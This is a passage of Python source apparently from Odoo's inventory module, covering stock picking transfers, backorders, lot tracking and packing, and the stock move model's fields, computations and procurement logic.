for pick in self.browse(cr, uid, ids, context=context):
self.rereserve_quants(cr, uid, pick, move_ids = [x.id for x in pick.move_lines
if x.state not in ('done', 'cancel')], context=context)
def rereserve_quants(self, cr, uid, picking, move_ids=[], context=None):
""" Unreserve quants then try to reassign quants."""
if context is None:
context = {}
stock_move_obj = self.pool.get('stock.move')
if not move_ids:
self.do_unreserve(cr, uid, [picking.id], context=context)
self.action_assign(cr, uid, [picking.id], context=context)
else:
if 'no_state_change' in context:
move = stock_move_obj.browse(cr, uid, move_ids, context=context)
stock_move_obj.do_unreserve(cr, uid, [m.id for m in move if m.reserved_quant_ids], context=context)
else:
stock_move_obj.do_unreserve(cr, uid, move_ids, context=context)
stock_move_obj.action_assign(cr, uid, move_ids, no_prepare=True, context=context)
def do_new_transfer(self, cr, uid, ids, context=None):
pack_op_obj = self.pool['stock.pack.operation']
data_obj = self.pool['ir.model.data']
for pick in self.browse(cr, uid, ids, context=context):
to_delete = []
if not pick.move_lines and not pick.pack_operation_ids:
raise UserError(_('Please create some Initial Demand or Mark as Todo and create some Operations. '))
# In draft or with no pack operations edited yet, ask if we can just do everything
if pick.state == 'draft' or all([x.qty_done == 0.0 for x in pick.pack_operation_ids]):
# If no lots when needed, raise error
picking_type = pick.picking_type_id
if (picking_type.use_create_lots or picking_type.use_existing_lots):
for pack in pick.pack_operation_ids:
if pack.product_id and pack.product_id.tracking != 'none':
raise UserError(_('Some products require lots, so you need to specify those first!'))
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_immediate_transfer')
wiz_id = self.pool['stock.immediate.transfer'].create(cr, uid, {'pick_id': pick.id}, context=context)
return {
'name': _('Immediate Transfer?'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.immediate.transfer',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': wiz_id,
'context': context,
}
# Check backorder should check for other barcodes
if self.check_backorder(cr, uid, pick, context=context):
view = data_obj.xmlid_to_res_id(cr, uid, 'stock.view_backorder_confirmation')
wiz_id = self.pool['stock.backorder.confirmation'].create(cr, uid, {'pick_id': pick.id}, context=context)
return {
'name': _('Create Backorder?'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'stock.backorder.confirmation',
'views': [(view, 'form')],
'view_id': view,
'target': 'new',
'res_id': wiz_id,
'context': context,
}
for operation in pick.pack_operation_ids:
if operation.qty_done < 0:
raise UserError(_('No negative quantities allowed'))
if operation.qty_done > 0:
pack_op_obj.write(cr, uid, operation.id, {'product_qty': operation.qty_done}, context=context)
else:
to_delete.append(operation.id)
if to_delete:
pack_op_obj.unlink(cr, uid, to_delete, context=context)
self.do_transfer(cr, uid, ids, context=context)
return
def check_backorder(self, cr, uid, picking, context=None):
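""" Returns True if, after recomputing with the done quantities, at least one move of the
picking has a non-zero remaining quantity (meaning a backorder may be needed). """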
need_rereserve, all_op_processed = self.picking_recompute_remaining_quantities(cr, uid, picking, done_qtys=True, context=context)
for move in picking.move_lines:
if float_compare(move.remaining_qty, 0, precision_rounding = move.product_id.uom_id.rounding) != 0:
return True
return False
def create_lots_for_picking(self, cr, uid, ids, context=None):
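""" Creates the production lots referenced by name on the pack operation lots of the pickings,
then removes pack operation lots with a zero quantity. """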
lot_obj = self.pool['stock.production.lot']
opslot_obj = self.pool['stock.pack.operation.lot']
to_unlink = []
for picking in self.browse(cr, uid, ids, context=context):
for ops in picking.pack_operation_ids:
for opslot in ops.pack_lot_ids:
if not opslot.lot_id:
lot_id = lot_obj.create(cr, uid, {'name': opslot.lot_name, 'product_id': ops.product_id.id}, context=context)
opslot_obj.write(cr, uid, [opslot.id], {'lot_id':lot_id}, context=context)
#Unlink pack operation lots where qty = 0
to_unlink += [x.id for x in ops.pack_lot_ids if x.qty == 0.0]
opslot_obj.unlink(cr, uid, to_unlink, context=context)
def do_transfer(self, cr, uid, ids, context=None):
"""
If no pack operation, we do simple action_done of the picking
Otherwise, do the pack operations
"""
if not context:
context = {}
notrack_context = dict(context, mail_notrack=True)
stock_move_obj = self.pool.get('stock.move')
self.create_lots_for_picking(cr, uid, ids, context=context)
for picking in self.browse(cr, uid, ids, context=context):
if not picking.pack_operation_ids:
self.action_done(cr, uid, [picking.id], context=context)
continue
else:
need_rereserve, all_op_processed = self.picking_recompute_remaining_quantities(cr, uid, picking, context=context)
#create extra moves in the picking (unexpected product moves coming from pack operations)
todo_move_ids = []
if not all_op_processed:
todo_move_ids += self._create_extra_moves(cr, uid, picking, context=context)
if need_rereserve or not all_op_processed:
moves_reassign = any(x.origin_returned_move_id or x.move_orig_ids for x in picking.move_lines if x.state not in ['done', 'cancel'])
if moves_reassign and (picking.location_id.usage not in ("supplier", "production", "inventory")):
ctx = dict(context)
ctx['reserve_only_ops'] = True #unnecessary to assign quants other than those involved with pack operations, as they will be unreserved anyway.
ctx['no_state_change'] = True
self.rereserve_quants(cr, uid, picking, move_ids=picking.move_lines.ids, context=ctx)
self.do_recompute_remaining_quantities(cr, uid, [picking.id], context=context)
#split move lines if needed
toassign_move_ids = []
for move in picking.move_lines:
remaining_qty = move.remaining_qty
if move.state in ('done', 'cancel'):
#ignore stock moves cancelled or already done
continue
elif move.state == 'draft':
toassign_move_ids.append(move.id)
if float_compare(remaining_qty, 0, precision_rounding = move.product_id.uom_id.rounding) == 0:
if move.state in ('draft', 'assigned', 'confirmed'):
todo_move_ids.append(move.id)
elif float_compare(remaining_qty,0, precision_rounding = move.product_id.uom_id.rounding) > 0 and \
float_compare(remaining_qty, move.product_qty, precision_rounding = move.product_id.uom_id.rounding) < 0:
new_move = stock_move_obj.split(cr, uid, move, remaining_qty, context=notrack_context)
todo_move_ids.append(move.id)
#Assign move as it was assigned before
toassign_move_ids.append(new_move)
todo_move_ids = list(set(todo_move_ids))
if todo_move_ids and not context.get('do_only_split'):
self.pool.get('stock.move').action_done(cr, uid, todo_move_ids, context=context)
elif context.get('do_only_split'):
context = dict(context, split=todo_move_ids)
self._create_backorder(cr, uid, picking, context=context)
return True
@api.cr_uid_ids_context
def do_split(self, cr, uid, picking_ids, context=None):
""" just split the picking (create a backorder) without making it 'done' """
if context is None:
context = {}
ctx = context.copy()
ctx['do_only_split'] = True
return self.do_transfer(cr, uid, picking_ids, context=ctx)
def put_in_pack(self, cr, uid, ids, context=None):
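""" Puts the processed quantities of the pack operations into a new package, splitting
partially processed operations first, and returns the id of the created package. """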
stock_move_obj = self.pool["stock.move"]
stock_operation_obj = self.pool["stock.pack.operation"]
package_obj = self.pool["stock.quant.package"]
package_id = False
for pick in self.browse(cr, uid, ids, context=context):
operations = [x for x in pick.pack_operation_ids if x.qty_done > 0 and (not x.result_package_id)]
pack_operation_ids = []
for operation in operations:
#If we haven't done all qty in the operation, we have to split it into 2 operations
op = operation
if operation.qty_done < operation.product_qty:
new_operation = stock_operation_obj.copy(cr, uid, operation.id, {'product_qty': operation.qty_done,'qty_done': operation.qty_done}, context=context)
stock_operation_obj.write(cr, uid, operation.id, {'product_qty': operation.product_qty - operation.qty_done,'qty_done': 0}, context=context)
if operation.pack_lot_ids:
packlots_transfer = [(4, x.id) for x in operation.pack_lot_ids]
stock_operation_obj.write(cr, uid, [new_operation], {'pack_lot_ids': packlots_transfer}, context=context)
# the stock.pack.operation.lot records now belong to the new, packaged stock.pack.operation
# we have to create new ones with new quantities for our original, unfinished stock.pack.operation
stock_operation_obj._copy_remaining_pack_lot_ids(cr, uid, new_operation, operation.id, context=context)
op = stock_operation_obj.browse(cr, uid, new_operation, context=context)
pack_operation_ids.append(op.id)
if operations:
stock_operation_obj.check_tracking(cr, uid, pack_operation_ids, context=context)
package_id = package_obj.create(cr, uid, {}, context=context)
stock_operation_obj.write(cr, uid, pack_operation_ids, {'result_package_id': package_id}, context=context)
else:
raise UserError(_('Please process some quantities to put in the pack first!'))
return package_id
class stock_production_lot(osv.osv):
_name = 'stock.production.lot'
_inherit = ['mail.thread']
_description = 'Lot/Serial'
_columns = {
'name': fields.char('Serial Number', required=True, help="Unique Serial Number"),
'ref': fields.char('Internal Reference', help="Internal reference number in case it differs from the manufacturer's serial number"),
'product_id': fields.many2one('product.product', 'Product', required=True, domain=[('type', 'in', ['product', 'consu'])]),
'quant_ids': fields.one2many('stock.quant', 'lot_id', 'Quants', readonly=True),
'create_date': fields.datetime('Creation Date'),
}
_defaults = {
'name': lambda x, y, z, c: x.pool.get('ir.sequence').next_by_code(y, z, 'stock.lot.serial'),
'product_id': lambda x, y, z, c: c.get('product_id', False),
}
_sql_constraints = [
('name_ref_uniq', 'unique (name, product_id)', 'The combination of serial number and product must be unique !'),
]
def action_traceability(self, cr, uid, ids, context=None):
""" It traces the information of lots
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: List of IDs selected
@param context: A standard dictionary
@return: A dictionary of values
"""
quant_obj = self.pool.get("stock.quant")
quants = quant_obj.search(cr, uid, [('lot_id', 'in', ids)], context=context)
moves = set()
for quant in quant_obj.browse(cr, uid, quants, context=context):
moves |= {move.id for move in quant.history_ids}
if moves:
return {
'domain': "[('id','in',[" + ','.join(map(str, list(moves))) + "])]",
'name': _('Traceability'),
'view_mode': 'tree,form',
'view_type': 'form',
'context': {'tree_view_ref': 'stock.view_move_tree'},
'res_model': 'stock.move',
'type': 'ir.actions.act_window',
}
return False
# ----------------------------------------------------
# Move
# ----------------------------------------------------
class stock_move(osv.osv):
_name = "stock.move"
_description = "Stock Move"
_order = 'picking_id, sequence, id'
def get_price_unit(self, cr, uid, move, context=None):
""" Returns the unit price to store on the quant """
return move.price_unit or move.product_id.standard_price
def name_get(self, cr, uid, ids, context=None):
res = []
for line in self.browse(cr, uid, ids, context=context):
name = line.location_id.name + ' > ' + line.location_dest_id.name
if line.product_id.code:
name = line.product_id.code + ': ' + name
if line.picking_id.origin:
name = line.picking_id.origin + '/ ' + name
res.append((line.id, name))
return res
def _quantity_normalize(self, cr, uid, ids, name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = {}
for m in self.browse(cr, uid, ids, context=context):
res[m.id] = uom_obj._compute_qty_obj(cr, uid, m.product_uom, m.product_uom_qty, m.product_id.uom_id, context=context)
return res
def _get_remaining_qty(self, cr, uid, ids, field_name, args, context=None):
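""" Computes, in the default UoM of the product, the quantity of the move that is not yet
covered by linked pack operations. """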
uom_obj = self.pool.get('product.uom')
res = {}
for move in self.browse(cr, uid, ids, context=context):
qty = move.product_qty
for record in move.linked_move_operation_ids:
qty -= record.qty
# Keeping in product default UoM
res[move.id] = float_round(qty, precision_rounding=move.product_id.uom_id.rounding)
return res
def _get_lot_ids(self, cr, uid, ids, field_name, args, context=None):
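""" Returns, for each move, the lots of its moved quants when done, or of its reserved quants otherwise. """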
res = dict.fromkeys(ids, False)
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
res[move.id] = [q.lot_id.id for q in move.quant_ids if q.lot_id]
else:
res[move.id] = [q.lot_id.id for q in move.reserved_quant_ids if q.lot_id]
return res
def _get_product_availability(self, cr, uid, ids, field_name, args, context=None):
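""" Computes the forecasted quantity for the move: its full quantity when done, otherwise the
unreserved quantity available in the source location and its children, capped by the move quantity. """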
quant_obj = self.pool.get('stock.quant')
res = dict.fromkeys(ids, False)
for move in self.browse(cr, uid, ids, context=context):
if move.state == 'done':
res[move.id] = move.product_qty
else:
sublocation_ids = self.pool.get('stock.location').search(cr, uid, [('id', 'child_of', [move.location_id.id])], context=context)
quant_ids = quant_obj.search(cr, uid, [('location_id', 'in', sublocation_ids), ('product_id', '=', move.product_id.id), ('reservation_id', '=', False)], context=context)
availability = 0
for quant in quant_obj.browse(cr, uid, quant_ids, context=context):
availability += quant.qty
res[move.id] = min(move.product_qty, availability)
return res
def _get_string_qty_information(self, cr, uid, ids, field_name, args, context=None):
uom_obj = self.pool.get('product.uom')
res = dict.fromkeys(ids, '')
precision = self.pool['decimal.precision'].precision_get(cr, uid, 'Product Unit of Measure')
for move in self.browse(cr, uid, ids, context=context):
if move.state in ('draft', 'done', 'cancel') or move.location_id.usage != 'internal':
res[move.id] = '' # 'not applicable' or 'n/a' could work too
continue
total_available = min(move.product_qty, move.reserved_availability + move.availability)
total_available = uom_obj._compute_qty_obj(cr, uid, move.product_id.uom_id, total_available, move.product_uom, round=False, context=context)
total_available = float_round(total_available, precision_digits=precision)
info = str(total_available)
#look in the settings if we need to display the UoM name or not
if self.pool.get('res.users').has_group(cr, uid, 'product.group_uom'):
info += ' ' + move.product_uom.name
if move.reserved_availability:
if move.reserved_availability != total_available:
#some of the available quantity is assigned and some are available but not reserved
reserved_available = uom_obj._compute_qty_obj(cr, uid, move.product_id.uom_id, move.reserved_availability, move.product_uom, round=False, context=context)
reserved_available = float_round(reserved_available, precision_digits=precision)
info += _(' (%s reserved)') % str(reserved_available)
else:
#all available quantity is assigned
info += _(' (reserved)')
res[move.id] = info
return res
def _get_reserved_availability(self, cr, uid, ids, field_name, args, context=None):
res = dict.fromkeys(ids, 0)
for move in self.browse(cr, uid, ids, context=context):
res[move.id] = sum([quant.qty for quant in move.reserved_quant_ids])
return res
def _get_move(self, cr, uid, ids, context=None):
res = set()
for quant in self.browse(cr, uid, ids, context=context):
if quant.reservation_id:
res.add(quant.reservation_id.id)
return list(res)
def _get_move_ids(self, cr, uid, ids, context=None):
res = []
for picking in self.browse(cr, uid, ids, context=context):
res += [x.id for x in picking.move_lines]
return res
def _get_moves_from_prod(self, cr, uid, ids, context=None):
if ids:
return self.pool.get('stock.move').search(cr, uid, [('product_id', 'in', ids)], context=context)
return []
def _set_product_qty(self, cr, uid, id, field, value, arg, context=None):
""" The meaning of product_qty field changed lately and is now a functional field computing the quantity
in the default product UoM. This code has been added to raise an error if a write is made given a value
for `product_qty`, where the same write should set the `product_uom_qty` field instead, in order to
detect errors.
"""
raise UserError(_('The requested operation cannot be processed because of a programming error setting the `product_qty` field instead of the `product_uom_qty`.'))
_columns = {
'sequence': fields.integer('Sequence'),
'name': fields.char('Description', required=True, select=True),
'priority': fields.selection(procurement.PROCUREMENT_PRIORITIES, 'Priority'),
'create_date': fields.datetime('Creation Date', readonly=True, select=True),
'date': fields.datetime('Date', required=True, select=True, help="Move date: scheduled date until move is done, then date of actual move processing", states={'done': [('readonly', True)]}),
'date_expected': fields.datetime('Expected Date', states={'done': [('readonly', True)]}, required=True, select=True, help="Scheduled date for the processing of this move"),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True, domain=[('type', 'in', ['product', 'consu'])], states={'done': [('readonly', True)]}),
'product_qty': fields.function(_quantity_normalize, fnct_inv=_set_product_qty, type='float', digits=0, store={
_name: (lambda self, cr, uid, ids, c={}: ids, ['product_id', 'product_uom', 'product_uom_qty'], 10),
}, string='Quantity',
help='Quantity in the default UoM of the product'),
'product_uom_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'),
required=True, states={'done': [('readonly', True)]},
help="This is the quantity of products from an inventory "
"point of view. For moves in the state 'done', this is the "
"quantity of products that were actually moved. For other "
"moves, this is the quantity of product that is planned to "
"be moved. Lowering this quantity does not generate a "
"backorder. Changing this quantity on assigned moves affects "
"the product reservation, and should be done with care."
),
'product_uom': fields.many2one('product.uom', 'Unit of Measure', required=True, states={'done': [('readonly', True)]}),
'product_tmpl_id': fields.related('product_id', 'product_tmpl_id', type='many2one', relation='product.template', string='Product Template'),
'product_packaging': fields.many2one('product.packaging', 'Preferred Packaging', help="It specifies attributes of packaging like type, quantity of packaging, etc."),
'location_id': fields.many2one('stock.location', 'Source Location', required=True, select=True, auto_join=True,
states={'done': [('readonly', True)]}, help="Sets a location if you produce at a fixed location. This can be a partner location if you subcontract the manufacturing operations."),
'location_dest_id': fields.many2one('stock.location', 'Destination Location', required=True, states={'done': [('readonly', True)]}, select=True,
auto_join=True, help="Location where the system will stock the finished products."),
'partner_id': fields.many2one('res.partner', 'Destination Address ', states={'done': [('readonly', True)]}, help="Optional address where goods are to be delivered, specifically used for allotment"),
'picking_partner_id': fields.related('picking_id', 'partner_id', type='many2one', relation='res.partner', string='Transfer Destination Address'),
'move_dest_id': fields.many2one('stock.move', 'Destination Move', help="Optional: next stock move when chaining them", select=True, copy=False),
'move_orig_ids': fields.one2many('stock.move', 'move_dest_id', 'Original Move', help="Optional: previous stock move when chaining them", select=True),
'picking_id': fields.many2one('stock.picking', 'Transfer Reference', select=True, states={'done': [('readonly', True)]}),
'note': fields.text('Notes'),
'state': fields.selection([('draft', 'New'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Move'),
('confirmed', 'Waiting Availability'),
('assigned', 'Available'),
('done', 'Done'),
], 'Status', readonly=True, select=True, copy=False,
help= "* New: When the stock move is created and not yet confirmed.\n"\
"* Waiting Another Move: This state can be seen when a move is waiting for another one, for example in a chained flow.\n"\
"* Waiting Availability: This state is reached when the procurement resolution is not straight forward. It may need the scheduler to run, a component to me manufactured...\n"\
"* Available: When products are reserved, it is set to \'Available\'.\n"\
"* Done: When the shipment is processed, the state is \'Done\'."),
'partially_available': fields.boolean('Partially Available', readonly=True, help="Checks if the move has some stock reserved", copy=False),
'price_unit': fields.float('Unit Price', help="Technical field used to record the product cost set by the user during a picking confirmation (when costing method used is 'average price' or 'real'). Value given in company currency and in product uom."), # as it's a technical field, we intentionally don't provide the digits attribute
'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
'split_from': fields.many2one('stock.move', string="Move Split From", help="Technical field used to track the origin of a split move, which can be useful in case of debug", copy=False),
'backorder_id': fields.related('picking_id', 'backorder_id', type='many2one', relation="stock.picking", string="Back Order of", select=True),
'origin': fields.char("Source Document"),
'procure_method': fields.selection([('make_to_stock', 'Default: Take From Stock'), ('make_to_order', 'Advanced: Apply Procurement Rules')], 'Supply Method', required=True,
help="""By default, the system will take from the stock in the source location and passively wait for availability. The other possibility allows you to directly create a procurement on the source location (and thus ignore its current stock) to gather products. If we want to chain moves and have this one to wait for the previous, this second option should be chosen."""),
# used for colors in tree views:
'scrapped': fields.related('location_dest_id', 'scrap_location', type='boolean', relation='stock.location', string='Scrapped', readonly=True),
'quant_ids': fields.many2many('stock.quant', 'stock_quant_move_rel', 'move_id', 'quant_id', 'Moved Quants', copy=False),
'reserved_quant_ids': fields.one2many('stock.quant', 'reservation_id', 'Reserved quants'),
'linked_move_operation_ids': fields.one2many('stock.move.operation.link', 'move_id', string='Linked Operations', readonly=True, help='Operations that impact this move for the computation of the remaining quantities'),
'remaining_qty': fields.function(_get_remaining_qty, type='float', string='Remaining Quantity', digits=0,
states={'done': [('readonly', True)]}, help="Remaining Quantity in default UoM according to operations matched with this move"),
'procurement_id': fields.many2one('procurement.order', 'Procurement'),
'group_id': fields.many2one('procurement.group', 'Procurement Group'),
'rule_id': fields.many2one('procurement.rule', 'Procurement Rule', help='The procurement rule that created this stock move'),
'push_rule_id': fields.many2one('stock.location.path', 'Push Rule', help='The push rule that created this stock move'),
'propagate': fields.boolean('Propagate cancel and split', help='If checked, when this move is cancelled, cancel the linked move too'),
'picking_type_id': fields.many2one('stock.picking.type', 'Picking Type'),
'inventory_id': fields.many2one('stock.inventory', 'Inventory'),
'lot_ids': fields.function(_get_lot_ids, type='many2many', relation='stock.production.lot', string='Lots'),
'origin_returned_move_id': fields.many2one('stock.move', 'Origin return move', help='move that created the return move', copy=False),
'returned_move_ids': fields.one2many('stock.move', 'origin_returned_move_id', 'All returned moves', help='Optional: all returned moves created from this move'),
'reserved_availability': fields.function(_get_reserved_availability, type='float', string='Quantity Reserved', readonly=True, help='Quantity that has already been reserved for this move'),
'availability': fields.function(_get_product_availability, type='float', string='Forecasted Quantity', readonly=True, help='Quantity in stock that can still be reserved for this move'),
'string_availability_info': fields.function(_get_string_qty_information, type='text', string='Availability', readonly=True, help='Show various information on stock availability for this move'),
'restrict_lot_id': fields.many2one('stock.production.lot', 'Lot', help="Technical field used to depict a restriction on the lot of quants to consider when marking this move as 'done'"),
'restrict_partner_id': fields.many2one('res.partner', 'Owner ', help="Technical field used to depict a restriction on the ownership of quants to consider when marking this move as 'done'"),
'route_ids': fields.many2many('stock.location.route', 'stock_location_route_move', 'move_id', 'route_id', 'Destination route', help="Preferred route to be followed by the procurement order"),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', help="Technical field depicting the warehouse to consider for the route selection on the next procurement (if any)."),
}
def _default_destination_address(self, cr, uid, context=None):
return False
def _default_group_id(self, cr, uid, context=None):
context = context or {}
if context.get('default_picking_id', False):
picking = self.pool.get('stock.picking').browse(cr, uid, context['default_picking_id'], context=context)
return picking.group_id.id
return False
_defaults = {
'partner_id': _default_destination_address,
'state': 'draft',
'priority': '1',
'product_uom_qty': 1.0,
'sequence': 10,
'scrapped': False,
'date': fields.datetime.now,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.move', context=c),
'date_expected': fields.datetime.now,
'procure_method': 'make_to_stock',
'propagate': True,
'partially_available': False,
'group_id': _default_group_id,
}
def _check_uom(self, cr, uid, ids, context=None):
for move in self.browse(cr, uid, ids, context=context):
if move.product_id.uom_id.category_id.id != move.product_uom.category_id.id:
return False
return True
_constraints = [
(_check_uom,
'You are trying to move a product using a UoM that is not compatible with the UoM of the product moved. Please use a UoM in the same UoM category.',
['product_uom']),
]
def init(self, cr):
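""" Creates the stock_move_product_location_index index on (product_id, location_id,
location_dest_id, company_id, state) if it does not exist yet. """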
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('stock_move_product_location_index',))
if not cr.fetchone():
cr.execute('CREATE INDEX stock_move_product_location_index ON stock_move (product_id, location_id, location_dest_id, company_id, state)')
@api.cr_uid_ids_context
def do_unreserve(self, cr, uid, move_ids, context=None):
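""" Unreserves the quants of the given moves and, unless told otherwise through the context,
resets their state to 'waiting' or 'confirmed' depending on whether they have ancestors. """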
quant_obj = self.pool.get("stock.quant")
for move in self.browse(cr, uid, move_ids, context=context):
if move.state in ('done', 'cancel'):
raise UserError(_('Cannot unreserve a done move'))
quant_obj.quants_unreserve(cr, uid, move, context=context)
if not context.get('no_state_change'):
if self.find_move_ancestors(cr, uid, move, context=context):
self.write(cr, uid, [move.id], {'state': 'waiting'}, context=context)
else:
self.write(cr, uid, [move.id], {'state': 'confirmed'}, context=context)
def _prepare_procurement_from_move(self, cr, uid, move, context=None):
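""" Returns the values used to create a procurement order from the given move,
propagating the procurement group according to the rule configuration. """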
origin = (move.group_id and (move.group_id.name + ":") or "") + (move.rule_id and move.rule_id.name or move.origin or move.picking_id.name or "/")
group_id = move.group_id and move.group_id.id or False
if move.rule_id:
if move.rule_id.group_propagation_option == 'fixed' and move.rule_id.group_id:
group_id = move.rule_id.group_id.id
elif move.rule_id.group_propagation_option == 'none':
group_id = False
return {
'name': move.rule_id and move.rule_id.name or "/",
'origin': origin,
'company_id': move.company_id and move.company_id.id or False,
'date_planned': move.date,
'product_id': move.product_id.id,
'product_qty': move.product_uom_qty,
'product_uom': move.product_uom.id,
'location_id': move.location_id.id,
'move_dest_id': move.id,
'group_id': group_id,
'route_ids': [(4, x.id) for x in move.route_ids],
'warehouse_id': move.warehouse_id.id or (move.picking_type_id and move.picking_type_id.warehouse_id.id or False),
'priority': move.priority,
}
def _push_apply(self, cr, uid, moves, context=None):
push_obj = self.pool.get("stock.location.path")
for move in moves:
#1) if the move is already chained, there is no need to check push rules
#2) if the move is a returned move, we don't want to check push rules, as returning a returned move is the only decent way
# to receive goods without triggering the push rules again (which would duplicate chained operations)
if not move.move_dest_id:
domain = [('location_from_id', '=', move.location_dest_id.id)]
#priority goes to the route defined on the product and product category
route_ids = [x.id for x in move.product_id.route_ids + move.product_id.categ_id.total_route_ids]
rules = push_obj.search(cr, uid, domain + [('route_id', 'in', route_ids)], order='route_sequence, sequence', context=context)
if not rules:
#then we search on the warehouse if a rule can apply
wh_route_ids = []
if move.warehouse_id:
wh_route_ids = [x.id for x in move.warehouse_id.route_ids]
elif move.picking_id.picking_type_id.warehouse_id:
wh_route_ids = [x.id for x in move.picking_id.picking_type_id.warehouse_id.route_ids]
if wh_route_ids:
rules = push_obj.search(cr, uid, domain + [('route_id', 'in', wh_route_ids)], order='route_sequence, sequence', context=context)
if not rules:
#if no specialized push rule has been found yet, we try to find a general one (without route)
rules = push_obj.search(cr, uid, domain + [('route_id', '=', False)], order='sequence', context=context)
if rules:
rule = push_obj.browse(cr, uid, rules[0], context=context)
# Make sure it is not returning the return
if (not move.origin_returned_move_id or move.origin_returned_move_id.location_dest_id.id != rule.location_dest_id.id):
push_obj._apply(cr, uid, rule, move, context=context)
return True
def _create_procurement(self, cr, uid, move, context=None):
""" This will create a procurement order """
return self.pool.get("procurement.order").create(cr, uid, self._prepare_procurement_from_move(cr, uid, move, context=context), context=context)
def _create_procurements(self, cr, uid, moves, context=None):
res = []
for move in moves:
res.append(self._create_procurement(cr, uid, move, context=context))
# Run procurements immediately when generated from multiple moves
self.pool['procurement.order'].run(cr, uid, res, context=context)
return res
def create(self, cr, uid, vals, context=None):
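""" Overridden to track the state change of the related picking in its mail thread
when a move is created directly on a picking. """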
if context is None:
context = {}
picking_obj = self.pool['stock.picking']
track = not context.get('mail_notrack') and vals.get('picking_id')
if track:
picking = picking_obj.browse(cr, uid, vals['picking_id'], context=context)
initial_values = {picking.id: {'state': picking.state}}
res = super(stock_move, self).create(cr, uid, vals, context=context)
if track:
picking_obj.message_track(cr, uid, [vals['picking_id']], picking_obj.fields_get(cr, uid, ['state'], context=context), initial_values, context=context)
return res
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
picking_obj = self.pool['stock.picking']
# Check that we do not modify a stock.move which is done
frozen_fields = set(['product_qty', 'product_uom', 'location_id', 'location_dest_id', 'product_id'])
moves = self.browse(cr, uid, ids, context=context)
for move in moves:
if move.state == 'done':
if frozen_fields.intersection(vals):
raise UserError(_('Quantities, Units of Measure, Products and Locations cannot be modified on stock moves that have already been processed (except by the Administrator).'))
propagated_changes_dict = {}
#propagation of quantity change
if vals.get('product_uom_qty'):
propagated_changes_dict['product_uom_qty'] = vals['product_uom_qty']
if vals.get('product_uom_id'):
propagated_changes_dict['product_uom_id'] = vals['product_uom_id']
if vals.get('product_uos_qty'):
propagated_changes_dict['product_uos_qty'] = vals['product_uos_qty']
if vals.get('product_uos_id'):
propagated_changes_dict['product_uos_id'] = vals['product_uos_id']
#propagation of expected date:
propagated_date_field = False
if vals.get('date_expected'):
#propagate any manual change of the expected date
propagated_date_field = 'date_expected'
elif (vals.get('state', '') == 'done' and vals.get('date')):
#propagate also any delta observed when setting the move as done
propagated_date_field = 'date'
if not context.get('do_not_propagate', False) and (propagated_date_field or propagated_changes_dict):
#any propagation is (maybe) needed
for move in self.browse(cr, uid, ids, context=context):
if move.move_dest_id and move.propagate:
if 'date_expected' in propagated_changes_dict:
propagated_changes_dict.pop('date_expected')
if propagated_date_field:
current_date = datetime.strptime(move.date_expected, DEFAULT_SERVER_DATETIME_FORMAT)
new_date = datetime.strptime(vals.get(propagated_date_field), DEFAULT_SERVER_DATETIME_FORMAT)
delta = new_date - current_date
if abs(delta.days) >= move.company_id.propagation_minimum_delta:
old_move_date = datetime.strptime(move.move_dest_id.date_expected, DEFAULT_SERVER_DATETIME_FORMAT)
new_move_date = (old_move_date + relativedelta.relativedelta(days=delta.days or 0)).strftime(DEFAULT_SERVER_DATETIME_FORMAT)
propagated_changes_dict['date_expected'] = new_move_date
#For pushed moves as well as for pulled moves, propagate by recursive call of write().
#Note that, for pulled moves we intentionally don't propagate on the procurement.
if propagated_changes_dict:
self.write(cr, uid, [move.move_dest_id.id], propagated_changes_dict, context=context)
track_pickings = not context.get('mail_notrack') and any(field in vals for field in ['state', 'picking_id', 'partially_available'])
if track_pickings:
to_track_picking_ids = set([move.picking_id.id for move in moves if move.picking_id])
if vals.get('picking_id'):
to_track_picking_ids.add(vals['picking_id'])
to_track_picking_ids = list(to_track_picking_ids)
pickings = picking_obj.browse(cr, uid, to_track_picking_ids, context=context)
initial_values = dict((picking.id, {'state': picking.state}) for picking in pickings)
res = super(stock_move, self).write(cr, uid, ids, vals, context=context)
if track_pickings:
picking_obj.message_track(cr, uid, to_track_picking_ids, picking_obj.fields_get(cr, uid, ['state'], context=context), initial_values, context=context)
return res
def onchange_quantity(self, cr, uid, ids, product_id, product_qty, product_uom):
""" On change of product quantity finds UoM
@param product_id: Product id
@param product_qty: Changed Quantity of product
@param product_uom: Unit of measure of product
@return: Dictionary of values
"""
warning = {}
result = {}
if (not product_id) or (product_qty <= 0.0):
result['product_qty'] = 0.0
return {'value': result}
product_obj = self.pool.get('product.product')
# Warn if the quantity was decreased
if ids:
for move in self.read(cr, uid, ids, ['product_qty']):
if product_qty < move['product_qty']:
warning.update({
'title': _('Information'),
'message': _("By changing this quantity here, you accept the "
"new quantity as complete: Odoo will not "
"automatically generate a back order.")})
break
return {'warning': warning}
def onchange_product_id(self, cr, uid, ids, prod_id=False, loc_id=False, loc_dest_id=False, partner_id=False):
""" On change of product id, if finds UoM, quantity
@param prod_id: Changed Product id
@param loc_id: Source location id
@param loc_dest_id: Destination location id
@param partner_id: Address id of partner
@return: Dictionary of values
"""
if not prod_id:
return {'domain': {'product_uom': []}}
user = self.pool.get('res.users').browse(cr, uid, uid)
lang = user and user.lang or False
if partner_id:
addr_rec = self.pool.get('res.partner').browse(cr, uid, partner_id)
if addr_rec:
lang = addr_rec and addr_rec.lang or False
ctx = {'lang': lang}
product = self.pool.get('product.product').browse(cr, uid, [prod_id], context=ctx)[0]
result = {
'name': product.partner_ref,
'product_uom': product.uom_id.id,
'product_uom_qty': 1.00,
}
if loc_id:
result['location_id'] = loc_id
if loc_dest_id:
result['location_dest_id'] = loc_dest_id
res = {'value': result,
